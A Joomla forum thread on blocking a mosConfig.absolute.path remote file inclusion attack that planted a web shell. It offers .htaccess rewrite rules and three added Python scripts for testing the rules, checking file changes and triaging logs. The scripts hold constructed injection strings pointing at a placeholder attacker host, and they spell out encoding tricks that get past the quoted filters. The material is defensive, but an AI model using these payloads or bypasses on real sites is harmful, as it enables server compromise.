mosConfig.absolute.path attack - can't stop with htaccess!!!
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Fledgling
- Posts: 4
- Joined: Fri May 22, 2009 9:06 pm
mosConfig.absolute.path attack - can't stop with htaccess!!!
OK, I don't usually post but this is driving me mad!
Joomla 1.0.15 + VirtueMart + SEF
I have the .htaccess supposedly blocking injection through the mosConfig.absolute.path exploit but it doesn't work - i.e. if I put the URL in it still loads the remote hack file.
The URL example being used to attack me is
http://www.mysite.co.uk/index.php?optio ... content/x??
The webpage that appears is a shell which enables you to browse the server, upload files, etc. - so not good as it's a shared server.
The line I have in .htaccess which should work is the standard:
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
At the moment I am resorting to trying to block other aspects of the URL [not working well] and denying IP addresses [yes, I know...]
Any insight would be much appreciated. I tend to blame VirtueMart as I have other 1.1.15 sites without these issues.
TIA to any and all
-------------------HTACCESS-FOLLOWS-----------------------
## Can be commented out if causes errors, see notes above.
Options FollowSymLinks
# mod_rewrite in use
RewriteEngine On
########## Begin - Rewrite rules to block out some common exploits
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
########## End - Rewrite rules to block out some common exploits
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla/MamboDirectory (just / for root)
RewriteBase /
# Trying to block attacker
order allow,deny
deny from 110.138.192.72
deny from 66.216.127.211
allow from all
########## Begin 3rd Party or Core SEF Section
#RewriteCond %{REQUEST_URI} ^(/component/option,com) [NC,OR] ##optional - see notes##
RewriteCond %{REQUEST_URI} (/|\.htm|\.php|\.html|/[^.]*)$ [NC]
RewriteCond %{REQUEST_URI} !^/.+astringintheurl.+/?$ [NC]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule (.*) index.php
########## End 3rd Party or Core SEF Section
php_flag magic_quotes_gpc on
php_flag register_globals off
---------------------------------------------------------------------
- fcoulter
- Joomla! Ace
- Posts: 1685
- Joined: Thu Sep 13, 2007 11:39 am
- Location: UK
- Contact:
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
You might try modifying the line
Code: Select all
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
I had similar problems to you; the problem with that line is that it is too specific: it does not cover some types of attack that use mosConfig.
I changed it to
Code: Select all
RewriteCond %{QUERY_STRING} .*mosConfig.*[OR]
RewriteCond %{QUERY_STRING} .*mosconfig.*[OR]
It should work for you; it did for me.
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
I have locked your other topic. Apart from suggesting the migration to 1.5.15, the advice by fcoulter is quite valid.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Fledgling
- Posts: 4
- Joined: Fri May 22, 2009 9:06 pm
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
thanks
Thanks to fcoulter for the solution to many days' headaches - that worked - it does indeed seem that that line was too specific.
For anyone else wanting to implement this, make sure you add a space between * and [OR], as the syntax made it not work at first for me, so if you want to copy and paste this is spot on -
RewriteCond %{QUERY_STRING} .*mosConfig.* [OR]
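The Python script below is an added example, not code from this thread or from Joomla. It applies the RewriteCond patterns quoted above (the stock mosConfig_[a-zA-Z_]{1,21}(=|\%3D) line and fcoulter's .*mosConfig.* / .*mosconfig.* pair) plus the .*http:.* line fcoulter adds in the following post to a set of constructed query strings, the way mod_rewrite does: as regexes over %{QUERY_STRING} exactly as the client sent it, still percent-encoded. The attacker host (a .invalid name) and the return= parameter are assumptions made for the example and do not come from the original posts. It shows why the stock line misses the dotted spelling in the thread title: PHP folds '.' and ' ' in parameter names to '_', so mosConfig.absolute.path still arrives as $mosConfig_absolute_path, but the pattern is anchored on the literal text mosConfig_. It also shows where the broader lines stop: the http: line refuses any legitimate parameter carrying a URL (fcoulter's caveat) yet misses https: and a percent-encoded URL, and percent-encoding one letter of the variable name (mos%43onfig) walks past every pattern because nothing in .htaccess decodes the query string before matching, while PHP decodes it before the variable is created.

```python
import re

# The RewriteCond patterns quoted in the thread, as Python regexes. mod_rewrite is
# PCRE-based and tests %{QUERY_STRING} as the client sent it, still percent-encoded,
# so the patterns are applied to the raw query string here, exactly as Apache does.
# Patterns this simple behave identically under Python's re and PCRE.
STOCK_RULE = [re.compile(r"mosConfig_[a-zA-Z_]{1,21}(=|\%3D)")]
BROAD_RULES = [re.compile(r".*mosConfig.*"), re.compile(r".*mosconfig.*")]
HTTP_RULE = [re.compile(r".*http:.*")]

RULESETS = {"stock": STOCK_RULE, "broad": BROAD_RULES, "http": HTTP_RULE}


def blocked(rules, query_string):
    """True if any RewriteCond in the chain matches, so the [F] RewriteRule fires."""
    return any(rule.search(query_string) for rule in rules)


def php_variable_name(param_name):
    """Variable name PHP derives from a request parameter name.

    PHP rewrites '.' and ' ' in incoming parameter names to '_', so under
    register_globals (or an emulation of it) `mosConfig.absolute.path` lands in
    the same $mosConfig_absolute_path that the stock rule is guarding. PHP also
    percent-decodes the name, which mod_rewrite never does for QUERY_STRING.
    """
    return param_name.replace(".", "_").replace(" ", "_")


# Constructed query strings modelled on the URL shape in the thread. The attacker
# host is a placeholder (.invalid TLD) and `return=` is an assumed legitimate
# parameter; neither comes from the original posts.
RFI = "http://attacker.invalid/shell.txt?"
PROBES = {
    "stock spelling": "option=com_content&mosConfig_absolute_path=" + RFI,
    "dotted spelling": "option=com_content&mosConfig.absolute.path=" + RFI,
    "encoded underscores": "option=com_content&mosConfig%5Fabsolute%5Fpath=" + RFI,
    "encoded letter, https": "option=com_content&mos%43onfig_absolute_path="
                             "https://attacker.invalid/shell.txt?",
    "encoded URL value": "option=com_content&mosConfig_absolute_path="
                         "http%3A%2F%2Fattacker.invalid%2Fshell.txt%3F",
    "legitimate URL parameter": "option=com_content&return=http://www.mysite.co.uk/",
}


def evaluate(probes=PROBES, rulesets=RULESETS):
    """Map each probe to the set of rule-set names whose chain would block it."""
    return {
        label: {name for name, rules in rulesets.items() if blocked(rules, qs)}
        for label, qs in probes.items()
    }


if __name__ == "__main__":
    for label, hits in evaluate().items():
        print(f"{label:26s} blocked by: {', '.join(sorted(hits)) or 'nothing'}")
    print("PHP variable for 'mosConfig.absolute.path':",
          php_variable_name("mosConfig.absolute.path"))
```

The practical reading is the one mandville gives above: these rewrite lines are a stopgap that narrows the attack surface, and the fix is to get off code that lets a request parameter set mosConfig_absolute_path in the first place.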
- fcoulter
- Joomla! Ace
- Posts: 1685
- Joined: Thu Sep 13, 2007 11:39 am
- Location: UK
- Contact:
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
Sorry, yes, the space is important!
In fact I also used
Code: Select all
RewriteCond %{QUERY_STRING} .*http:.* [OR]
That effectively blocked out all attempts at remote file inclusion through mosConfig or other means. But you need to think before using this, because there might be legitimate reasons for including a URL in the query string on your site, in which case this will cause problems.
I was getting a lot of attempts at remote file inclusion aimed at software I didn't even have installed on my site!! It was getting rather annoying, so this put a stop to it.
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"
-
- Joomla! Apprentice
- Posts: 24
- Joined: Mon Aug 25, 2008 2:52 pm
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
I've been having the same issue. fcoulter - I've applied your fix and I'm hoping it works. It seems that every week, though, a new directory is added to my root containing all of the spam links. Do you know the names of any PHP files to look out for? For instance, the first time this problem occurred there was an add.php file that I found that contained malicious script.
Any other advice other than the modifications to .htaccess would be appreciated.
- fcoulter
- Joomla! Ace
- Posts: 1685
- Joined: Thu Sep 13, 2007 11:39 am
- Location: UK
- Contact:
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
If a new directory is being added to your site then clearly the site security has been compromised. I suggest that you change your FTP passwords for a start.
Also look at this link. http://docs.joomla.org/Security_Checkli ... ng_Started
Good luck with this.
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
You can also use the cron file checker on checklist 7 to notify you of any files.
Also, running the forum post tool may highlight some holes/errors to us.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
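The weekly new directory and the add.php file described above are what a file-change baseline catches, which is the job the cron file checker mandville points to does. The script below is an added example, not the checklist's tool and not code from this thread: it hashes every regular file under a web root, stores the result as JSON, and on the next run reports files that are new, modified or gone. The demo builds a throw-away web root in a temporary directory, takes a baseline, then drops a data.php and appends a hidden link to index.php to show the diff; those file names and contents are constructed for the example. Keep the real baseline file outside the web root and unwritable by the web server user, otherwise whoever drops the shell can refresh the baseline as well.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path, chunk_size=65536):
    """SHA-256 of a file, read in chunks so large uploads need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def snapshot(root):
    """Map relative POSIX path -> SHA-256 for every regular file under root."""
    root = Path(root)
    return {
        path.relative_to(root).as_posix(): hash_file(path)
        for path in sorted(root.rglob("*"))
        if path.is_file()
    }


def compare(baseline, current):
    """Files added, removed or changed between two snapshots."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def save_baseline(snap, baseline_file):
    """Persist a snapshot; store this file outside the web root."""
    Path(baseline_file).write_text(json.dumps(snap, indent=1, sort_keys=True))


def load_baseline(baseline_file):
    return json.loads(Path(baseline_file).read_text())


def demo():
    """Throw-away web root: baseline it, simulate the changes the posts
    describe, and return the diff. All names and contents are constructed."""
    with tempfile.TemporaryDirectory() as tmp:
        web = Path(tmp, "public_html")
        (web / "images").mkdir(parents=True)
        (web / "index.php").write_text("<?php require 'configuration.php'; ?>\n")
        (web / "configuration.php").write_text(
            "<?php $mosConfig_absolute_path = '/home/site/public_html'; ?>\n")
        (web / "images" / "logo.gif").write_bytes(b"GIF89a")

        baseline_file = Path(tmp, "baseline.json")  # beside, not inside, public_html
        save_baseline(snapshot(web), baseline_file)

        # Stand-ins for a dropped PHP file and spam links appended to index.php.
        (web / "images" / "data.php").write_text(
            "<?php /* dropped file; contents irrelevant to the check */ ?>\n")
        with (web / "index.php").open("a") as fh:
            fh.write('<div style="display:none"><a href="http://spam.invalid/">x</a></div>\n')

        return compare(load_baseline(baseline_file), snapshot(web))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9s}", ", ".join(paths) or "-")
```

Run snapshot() once from cron against the live web root after a clean install or clean-up, then run compare() against the stored baseline on a schedule and mail the result; any entry under "added" that ends in .php, or any change to a file you did not edit, is the signal the posts above were looking for.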
-
- Joomla! Apprentice
- Posts: 24
- Joined: Mon Aug 25, 2008 2:52 pm
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
Yes, FTP password has been changed. Like I said, this has been happening for a few months now. The odd thing is that the attacks that I appear to be getting are common attacks in earlier versions of Joomla, but I am up to date with all that.
Been through the checklist, not the cron file check though. Will do that today.
Other update: Since the change in the .htaccess file, there are no recorded attacks based on what I see on sh404SEF. Not too sure what to think of this fact because I know we have been getting many attacks, and by seeing it in the sh404SEF dashboard I know that the attacks have been blocked. Still, I don't see any new directories this morning and there are no weird links hidden in my index.php.
- fcoulter
- Joomla! Ace
- Posts: 1685
- Joined: Thu Sep 13, 2007 11:39 am
- Location: UK
- Contact:
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
If you have blocked attacks through your .htaccess file then you will no longer see them in sh404sef, because they are stopped before your Joomla site is loaded, so sh404sef never gets to see them.
You would need to check your site (server) logs to see them.
I have been getting a lot of attacks aimed at earlier versions of Joomla, and indeed other systems that don't even exist on my site, all the more annoying because so utterly pointless.
I also think that there are more exploits aimed at getting hold of FTP passwords these days - that is probably how they got into your site. The problem is that FTP is not very secure.
Last edited by fcoulter on Tue Mar 30, 2010 3:08 pm, edited 1 time in total.
http://www.spiralscripts.co.uk for Joomla! extensions
http://www.fionacoulter.com/blog my personal website
Security Forum moderator :: VEL team member
"Wearing my tin foil hat with pride"
-
- Joomla! Apprentice
- Posts: 24
- Joined: Mon Aug 25, 2008 2:52 pm
Re: mosConfig.absolute.path attack - can't stop with htaccess!!!
I found something I think anyone with this problem should look for:
http://forums.theplanet.com/index.php?showtopic=90109
The script was hidden in a file named data.php. A hacker can call it whatever he wants though. Disturbing.
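fcoulter's point above that requests refused by .htaccess never reach sh404SEF means the server access log is the only place they show up, and it is also where you find out which attempts were not refused. The script below is an added example, not code from this thread: it parses Apache combined-format log lines, flags any request that sets a mosConfig_* variable (after applying PHP's '.' and ' ' to '_' folding) or passes a remote URL in a parameter, and separates requests Apache answered with 403 from those that reached PHP. The sample log lines are constructed (documentation IP ranges, a placeholder attacker host) and the remote-URL heuristic deliberately over-matches, as the return= line shows; tune it to whatever URL-carrying parameters your site legitimately uses. Because parse_qsl percent-decodes names and values, spellings such as mos%43onfig and %68ttps:// that slip past a RewriteCond on the raw query string are still caught here.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" access log line; only client IP, request target and status
# code are needed here.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)
REMOTE_URL = re.compile(r"^\s*(https?|ftp)://", re.I)


def php_variable_name(param_name):
    """PHP folds '.' and ' ' in parameter names to '_' before register_globals
    (or Joomla 1.0's emulation of it) turns them into variables."""
    return param_name.replace(".", "_").replace(" ", "_")


def attack_indicators(target):
    """Reasons a request target looks like a mosConfig / remote-include attempt.

    parse_qsl percent-decodes names and values, so spellings that slip past a
    RewriteCond on the raw query string (mos%43onfig, %68ttps://) are still seen.
    """
    reasons = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        folded = php_variable_name(name)
        if folded.lower().startswith("mosconfig_"):
            reasons.append(f"sets ${folded}")
        if REMOTE_URL.match(value):
            reasons.append(f"remote URL in {folded}")
    return reasons


def triage(lines):
    """Split flagged requests into those Apache refused (403) and those that
    reached PHP, and count flagged requests per client IP."""
    blocked, reached_php, per_ip = [], [], Counter()
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = attack_indicators(m["target"])
        if not reasons:
            continue
        per_ip[m["ip"]] += 1
        entry = {"ip": m["ip"], "status": int(m["status"]),
                 "target": m["target"], "reasons": reasons}
        (blocked if m["status"] == "403" else reached_php).append(entry)
    return {"blocked": blocked, "reached_php": reached_php, "per_ip": per_ip}


# Constructed sample log lines: documentation IP ranges and a placeholder
# attacker host, not taken from any real server.
SAMPLE_LOG = """\
192.0.2.10 - - [22/May/2009:21:06:01 +0100] "GET /index.php?option=com_content&mosConfig.absolute.path=http://attacker.invalid/shell.txt? HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
192.0.2.10 - - [22/May/2009:21:06:05 +0100] "GET /index.php?option=com_content&mos%43onfig_absolute_path=%68ttps://attacker.invalid/shell.txt? HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.7 - - [22/May/2009:21:07:30 +0100] "GET /index.php?option=com_content&mosConfig_absolute_path=http://attacker.invalid/shell.txt? HTTP/1.1" 403 214 "-" "libwww-perl/5.805"
203.0.113.5 - - [22/May/2009:21:08:12 +0100] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 14322 "-" "Mozilla/5.0"
203.0.113.5 - - [22/May/2009:21:08:13 +0100] "GET /index.php?option=com_content&return=http://www.mysite.co.uk/ HTTP/1.1" 200 14322 "-" "Mozilla/5.0"
""".splitlines()


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for entry in result["blocked"]:
        print("blocked    ", entry["ip"], "; ".join(entry["reasons"]))
    for entry in result["reached_php"]:
        print("REACHED PHP", entry["ip"], "; ".join(entry["reasons"]))
    print("flagged requests per IP:", dict(result["per_ip"]))
```

Anything in reached_php with a 200 status is a request the rewrite rules let through to Joomla and is worth checking against the file-change report; the per-IP counts are the honest replacement for the deny-from list in the first post, since they come from what actually hit the server rather than from guesswork.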